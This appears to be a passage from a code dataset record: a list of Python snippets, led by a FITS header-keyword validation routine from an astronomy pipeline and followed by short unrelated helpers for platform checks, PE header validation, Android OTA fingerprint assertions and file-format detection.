'None_OK':True},\n 'T-FWS': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-M2HOLD': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-GUICAM': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-M1': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-CRYWIN': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-CRYGET': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-CRYCP': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PRES-CRY': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'WINDAVE': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'WINDGUST': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'WINDDIR': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'SITELAT': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'SITELONG': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'ELEVATIO': {'htype':'raw', 'dtype':int, 'DB':True, 'None_OK':True},\n #'WEATIME': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'FILTER': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n #'FILTERID': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'CCD-ID': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'CONTROLL': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'DETSPEED': {'htype':'raw', 'dtype':int, 'DB':True, 'None_OK':True},\n 'CCD-NW': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'CCD-NH': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'INSTRUME': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'FOCUSPOS': {'htype':'raw', 'dtype':int, 'DB':True, 'None_OK':True},\n 'IMAGETYP': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'OBJECT': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'AIRMASS': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'ORIGFILE': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'OBSERVER': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'ABOTVER': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'PROGNAME': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'PROGID': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GUIDERST': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GUIDERFQ': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'TRAKTIME': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 
'ADCX': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'ADCY': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n #\n # full header\n 'BB-V': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':False},\n 'BB-START': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':False},\n 'KW-V': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':False},\n 'LOG': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'LOG-IMA': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'N-INFNAN': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'XTALK-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'XTALK-F': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'NONLIN-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'NONLIN-F': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'GAIN-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'GAIN': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'GAIN1': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'GAIN16': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'OS-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'BIASMEAN': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'BIASM1': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'BIASM16': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RDNOISE': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RDN1': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RDN16': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'BIAS1A0': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BIAS1A1': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'VFITOK1': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'BIAS16A0': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BIAS16A1': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'VFITOK16': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'MBIAS-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'MBIAS-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'MB-NDAYS': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'SATURATE': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'NOBJ-SAT': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'MFLAT-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'MFLAT-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'MF-NDAYS': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'MFRING-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'MFRING-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'FRRATIO': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'COSMIC-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'NCOSMICS': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'SAT-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'NSATS': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'REDFILE': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'MASKFILE': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'S-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'S-V': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'S-NOBJ': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 
'S-FWHM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'S-FWSTD': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'S-SEEING': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-SEESTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-ELONG': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-ELOSTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-BKG': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-BKGSTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-VIGNET': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'BKG-CORR': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'BKG-CHI2': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BKG-CF1': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BKG-CF16': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BKG-FDEG': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'BKG-FC0': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'A-V': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'A-INDEX': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'A-PSCALE': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-PSCALX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-PSCALY': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-ROT': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-ROTX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-ROTY': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-CAT-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'A-NAST': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'A-TNAST': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'A-NAMAX': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'A-DRA': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-DRASTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-DDEC': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-DDESTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PSF-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'PSF-V': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'PSF-RAD': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-RADP': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-SIZE': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'PSF-FRAC': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-SAMP': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-CFGS': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'PSF-NOBJ': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'PSF-FIX': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'PSF-PLDG': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PSF-CHI2': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PSF-FWHM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-SEE': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PSF-PMIN': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-PMAX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-PMED': {'htype':'full', 'dtype':float, 
'DB':False, 'None_OK':True},\n 'PSF-PSTD': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-BMIN': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-BMAX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-BMED': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-BSTD': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMNM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMXM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMDM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-ESTM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMNM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMXM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMDM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FSTM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMNG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMXG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMDG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-ESTG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMNG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMXG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMDG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FSTG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PC-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'PC-CAT-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'PC-NCAL': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'PC-TNCAL': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-FNCAL': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-NCMAX': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-NCMIN': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-ZPFDG': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-ZPF0': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PC-TNSUB': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-NSUB': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-MZPD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PC-MZPS': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PC-ZPDEF': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PC-ZP': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PC-ZPSTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PC-EXTCO': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'AIRMASSC': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RA-CNTR': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'DEC-CNTR': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PC-AIRM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'NSIGMA': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'LIMEFLUX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'LIMMAG': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'NOBJECTS': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'RADECOFF': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'FORMAT-P': {'htype':'full', 'dtype':bool, 
'DB':False, 'None_OK':True},\n 'DUMCAT': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'QC-FLAG': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':False},\n 'DATEFILE': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n #\n # transient header\n 'SWARP-P': {'htype':'trans', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'SWARP-V': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'Z-REF': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'Z-DXYLOC': {'htype':'trans', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'Z-DX': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-DY': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-DXSTD': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-DYSTD': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-FNRLOC': {'htype':'trans', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'Z-FNR': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-FNRSTD': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-P': {'htype':'trans', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'Z-V': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'Z-SIZE': {'htype':'trans', 'dtype':int, 'DB':False, 'None_OK':True},\n 'Z-BSIZE': {'htype':'trans', 'dtype':int, 'DB':False, 'None_OK':True},\n 'Z-SCMED': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-SCSTD': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-FPEMED': {'htype':'trans', 'dtype':float, 'DB':False, 'None_OK':True},\n 'Z-FPESTD': {'htype':'trans', 'dtype':float, 'DB':False, 'None_OK':True},\n 'T-NSIGMA': {'htype':'trans', 'dtype':int, 'DB':True, 'None_OK':True},\n 'T-LFLUX': {'htype':'trans', 'dtype':float, 'DB':False, 'None_OK':True},\n 'T-NTRANS': {'htype':'trans', 'dtype':int, 'DB':True, 'None_OK':True},\n 'T-FTRANS': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-LMAG': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-NFAKE': {'htype':'trans', 'dtype':int, 'DB':False, 'None_OK':True},\n 'T-FAKESN': {'htype':'trans', 'dtype':float, 'DB':False, 'None_OK':True},\n 'MC-P': {'htype':'trans', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'MC-V': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'MC-MODEL': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'TDUMCAT': {'htype':'trans', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'TQC-FLAG': {'htype':'trans', 'dtype':str, 'DB':True, 'None_OK':False},\n }\n\n # read header of filename\n if isfile (filename):\n header = read_hdulist (filename, get_data=False, get_header=True)\n else:\n # return success=False if it does not exist\n log.warning ('file {} does not exist; not able to verify its header'\n .format(filename))\n return False\n\n\n # force [htypes] to be a list\n htypes_list = list(htypes)\n\n # loop keys in dict_head\n for key in dict_head.keys():\n\n # only check keywords with htype matching the input [htypes]\n if dict_head[key]['htype'] not in htypes_list:\n continue\n\n # check that key is present in header\n if key in header:\n\n # provide warning if dtype not as expected and header\n # keyword value is not 'None'\n if (dict_head[key]['dtype'] != type(header[key]) and\n header[key] != 'None'):\n log.warning ('dtype of keyword {}: {} does not match the '\n 'expected dtype: {} in header of {}'\n .format(key, type(header[key]),\n dict_head[key]['dtype'], filename))\n\n # if key goes to DataBase and value is 'None' or None\n # while 
'None_OK' is False, raise an exception\n if (dict_head[key]['DB'] and not dict_head[key]['None_OK'] and\n (header[key] is None or header[key] == 'None')):\n msg = ('DataBase keyword {} not allowed to have \\'None\\' or '\n 'None value in header of {}'.format(key, filename))\n log.error (msg)\n raise ValueError (msg)\n\n\n else:\n msg = 'keyword {} not present in header of {}'.format(key, filename)\n # if keyword will be ingested into the database, raise an exception\n if dict_head[key]['DB']:\n log.error (msg)\n raise KeyError (msg)\n\n else:\n log.warning (msg)\n\n\n return", "def is64bit(self):\n return platform.machine().endswith('64')", "def osarch_is_64_bit():\n return osarch_match(\"64-bit\")", "def longdouble_lte_float64():\n return np.longdouble(2**53) == np.longdouble(2**53) + 1", "def is64Bit(program: ghidra.program.model.listing.Program) -> bool:\n ...", "def is_64bit(self):\n return self.machine == 'x86_64'", "def isFloor(self, x, y):\n\t\treturn self.getValue(x, y) == self.floor_char", "def valid(self, nt_header):\n try:\n return (self.OriginalFirstThunk != 0 and\n self.OriginalFirstThunk < nt_header.OptionalHeader.SizeOfImage and\n self.FirstThunk != 0 and\n self.FirstThunk < nt_header.OptionalHeader.SizeOfImage and\n self.Name < nt_header.OptionalHeader.SizeOfImage)\n except obj.InvalidOffsetError:\n return False", "def use_long_headers(header_row, long_to_short_dict):\n col_matches = 0\n for value in header_row:\n if FieldCleaner.clean_string(value) in long_to_short_dict:\n col_matches += 1\n # if most of column headers are in the long format,\n # we'll treat the file as having long headers\n return col_matches > .5 * len(header_row)", "def AssertSomeThumbprint(self, *fp):\n if not fp:\n raise ValueError(\"must specify some thumbprints\")\n cmd = (' ||\\n '.join([('getprop(\"ro.build.thumbprint\") == \"%s\"') % i\n for i in fp]) +\n ' ||\\n abort(\"E%d: Package expects build thumbprint of %s; this '\n 'device has \" + getprop(\"ro.build.thumbprint\") + \".\");') % (\n common.ErrorCode.THUMBPRINT_MISMATCH, \" or \".join(fp))\n self.script.append(cmd)", "def has_image_data (ff_hdus_list, which_hdu=0):\n if (which_hdu == 0): # heuristic for Primary HDU\n if (ff_hdus_list[which_hdu].header.get('NAXIS') == 2):\n return True\n else:\n return False\n else: # it's an extension and so marked\n return ( (len(ff_hdus_list) > which_hdu) and\n (ff_hdus_list[which_hdu].header.get('XTENSION') == 'IMAGE') )", "def AssertFingerprintOrThumbprint(self, fp, tp):\n cmd = ('getprop(\"ro.build.fingerprint\") == \"{fp}\" ||\\n'\n ' getprop(\"ro.build.thumbprint\") == \"{tp}\" ||\\n'\n ' abort(\"Package expects build fingerprint of {fp} or '\n 'thumbprint of {tp}; this device has a fingerprint of \" '\n '+ getprop(\"ro.build.fingerprint\") + \" and a thumbprint of \" '\n '+ getprop(\"ro.build.thumbprint\") + \".\");').format(fp=fp, tp=tp)\n self.script.append(cmd)", "def disk_is_valid(dhandle):\n if is_64bits:\n return dhandle.value != c_uint64(0).value\n else:\n return dhandle.value != c_uint32(0).value", "def is_image_size_64(image):\n return image['height'] == 64 and image['width'] == 64", "def has_supported_header_hormat(cls, csv_reader):\n return csv_reader.fieldnames == cls.INGFormatHeader", "def _check_header_data(self, scan_data, min_rt=None, max_rt=None, ms_level=None, polarity=None):\n \n if min_rt is not None and scan_data['retention_time'] < min_rt:\n return False\n \n if max_rt is not None and scan_data['retention_time'] > max_rt:\n return False\n \n if ms_level is not None and 
scan_data['ms_level'] != ms_level:\n return False\n \n if polarity is not None and scan_data['polarity'] != polarity:\n return False\n \n return True", "def is_64bit():\n is64bit = sys.maxsize > 2 ** 32\n if sys.platform == \"cli\":\n is64bit = sys.executable.endswith(\"ipy64.exe\")\n return is64bit", "def is_rfft(obj):\n if not (hasattr(obj, 'nx') and hasattr(obj, 'dx') and hasattr(obj, 'ny')\n and hasattr(obj, 'dy') and hasattr(obj, 'fft')):\n return False\n\n return obj.fft.shape == (obj.nx, obj.ny / 2 + 1)", "def uniform_shift_check(optree):\n if isinstance(optree, (BitLogicLeftShift, BitLogicRightShift, BitArithmeticRightShift)):\n return uniform_vector_constant_check(optree.get_input(1)) \\\n or not optree.get_input(1).get_precision().is_vector_format()\n return False", "def is_header(fields):\n if len(fields) < 11:\n return None\n # Test a column which should usually be a number in data lines and never a number in header lines.\n try:\n float(fields[8])\n return False\n except ValueError:\n pass\n first_field = fields[0]\n # An explicitly commented line is a header.\n if first_field.startswith('#'):\n return True\n # The first field in a header is usually these two (and never these in data lines).\n if first_field.lower() == 'sample' or first_field.lower() == 'family':\n return True\n # Fallback 1: There should never be a number in a header line. If we find one, it's a data line.\n for field in fields:\n try:\n float(field)\n return False\n except ValueError:\n pass\n # Fallback 2: Just test whether any of the known labels is in the line.\n for label in LABELS:\n if label in fields:\n return True\n for label in LABELS:\n if label.lower() in fields:\n return True", "def valid(self, nt_header):\n try:\n return (self.AddressOfFunctions < nt_header.OptionalHeader.SizeOfImage and\n self.AddressOfNameOrdinals < nt_header.OptionalHeader.SizeOfImage and\n self.AddressOfNames < nt_header.OptionalHeader.SizeOfImage and\n self.NumberOfFunctions < 0x7FFF and\n self.NumberOfNames < 0x7FFF)\n except obj.InvalidOffsetError:\n return False", "def fp_eq(x: float, y: float) -> bool:\n return fabs(x-y) < 10**-12", "def from_win_64_hex(self):\n try:\n base10_microseconds = int(wh, 16) / 10\n dt_obj = self.epoch_1601 + timedelta(microseconds=base10_microseconds)\n self.in_windows_hex_64 = dt_obj.strftime('%Y-%m-%d %H:%M:%S.%f')\n except Exception as e:\n if not args.log:\n pass\n else:\n logging.error(str(type(e)) + \",\" + str(e))\n self.in_windows_hex_64 = False\n return self.in_windows_hex_64", "def fp_gt(x: float, y: float) -> bool:\n return not fp_eq(x, y) and x > y", "def isThumb(self):\r\n output = False\r\n ea = self.func_ea\r\n while ea < self.func_ea + self.getSize():\r\n size = idc.get_item_size(ea)\r\n if size == 2 and idc.isCode(idc.GetFlags(ea)):\r\n output = True\r\n break\r\n ea = ea + size\r\n return output", "def check_feature_screening(\n screening_percentile, mask_img, is_classification, verbose=0\n):\n f_test = f_classif if is_classification else f_regression\n\n if screening_percentile == 100 or screening_percentile is None:\n return None\n elif not (0.0 <= screening_percentile <= 100.0):\n raise ValueError(\n \"screening_percentile should be in the interval\"\n f\" [0, 100], got {screening_percentile:g}\"\n )\n else:\n # correct screening_percentile according to the volume of the data mask\n screening_percentile_ = _adjust_screening_percentile(\n screening_percentile, mask_img, verbose=verbose\n )\n\n return SelectPercentile(f_test, percentile=int(screening_percentile_))", "def 
test_CheckHeadroom_WithMke2fsOutput(self):\n input_dir = common.MakeTempDir()\n output_image = common.MakeTempFile(suffix='.img')\n command = ['mkuserimg_mke2fs.sh', input_dir, output_image, 'ext4',\n '/system', '409600', '-j', '0']\n ext4fs_output, exit_code = RunCommand(command)\n self.assertEqual(0, exit_code)\n\n prop_dict = {\n 'fs_type' : 'ext4',\n 'partition_headroom' : '40960',\n 'mount_point' : 'system',\n }\n self.assertTrue(CheckHeadroom(ext4fs_output, prop_dict))\n\n prop_dict = {\n 'fs_type' : 'ext4',\n 'partition_headroom' : '413696',\n 'mount_point' : 'system',\n }\n self.assertFalse(CheckHeadroom(ext4fs_output, prop_dict))\n\n common.Cleanup()", "def Check_AlphaScreen_GST_FHs(mol, detail=False, showSMILES=False):\n GST = Filter('AlphaScreen_GST_FHs',detail, showSMILES)\n GST.get_pattl()\n res = GST.scan(mol)\n return res", "def fp_lt(x: float, y: float) -> bool:\n return not fp_eq(x, y) and x < y", "def _row_or_col_is_header(s_count, v_count):\n if s_count == 1 and v_count == 1:\n return False\n else:\n return (s_count + 1) / (v_count + s_count + 1) >= 2. / 3.", "def AssertSomeFingerprint(self, *fp):\n if not fp:\n raise ValueError(\"must specify some fingerprints\")\n cmd = (' ||\\n '.join([('getprop(\"ro.build.fingerprint\") == \"%s\"') % i\n for i in fp]) +\n ' ||\\n abort(\"E%d: Package expects build fingerprint of %s; '\n 'this device has \" + getprop(\"ro.build.fingerprint\") + \".\");') % (\n common.ErrorCode.FINGERPRINT_MISMATCH, \" or \".join(fp))\n self.script.append(cmd)", "def check_bit_exactness(input_raw_file):\n (t1, f1) = interpolate(input_raw_file, 'cpu_nn_lena.dat', 'cpu', 1, 'nn', 8000, 4000)\n (t2, f2) = interpolate(input_raw_file, 'gpu_nn_lena.dat', 'gpu', 1, 'nn', 8000, 4000)\n (t3, f3) = interpolate(input_raw_file, 'cpu_bl_lena.dat', 'cpu', 1, 'bl', 8000, 4000)\n (t4, f4) = interpolate(input_raw_file, 'gpu_bl_lena.dat', 'gpu', 1, 'bl', 8000, 4000)\n\n if filecmp.cmp(f1, f2, shallow=True):\n print(\"NN interpolation on GPU is bit exact with CPU\")\n if filecmp.cmp(f3, f4, shallow=True):\n print(\"Bilinear interpolation on GPU is bit exact with CPU\")", "def Check_AlphaScreen_HIS_FHs(mol, detail=False, showSMILES=False):\n HIS = Filter('AlphaScreen_HIS_FHs', detail, showSMILES)\n HIS.get_pattl()\n res = HIS.scan(mol)\n return res", "def check_large_file(self, **kw):\n\n\tif not 'define_name' in kw:\n\t\tkw['define_name'] = 'HAVE_LARGEFILE'\n\tif not 'execute' in kw:\n\t\tkw['execute'] = True\n\n\tif not 'features' in kw:\n\t\tif self.env.CXX:\n\t\t\tkw['features'] = ['cxx', 'cxxprogram']\n\t\telse:\n\t\t\tkw['features'] = ['c', 'cprogram']\n\n\tkw['fragment'] = LARGE_FRAGMENT\n\tkw['msg'] = 'Checking for large file support'\n\ttry:\n\t\tself.check(**kw)\n\texcept self.errors.ConfigurationError:\n\t\tpass\n\telse:\n\t\treturn True\n\n\tkw['msg'] = 'Checking for -D_FILE_OFFSET_BITS=64'\n\tkw['defines'] = ['_FILE_OFFSET_BITS=64']\n\ttry:\n\t\tself.check(**kw)\n\texcept self.errors.ConfigurationError:\n\t\tpass\n\telse:\n\t\tself.define('_FILE_OFFSET_BITS', 64)\n\t\treturn True\n\n\tself.fatal('There is no support for large files')", "def has_catalog_data (ff_hdus_list, which_hdu=1):\n if (which_hdu == 0): # not allowed? 
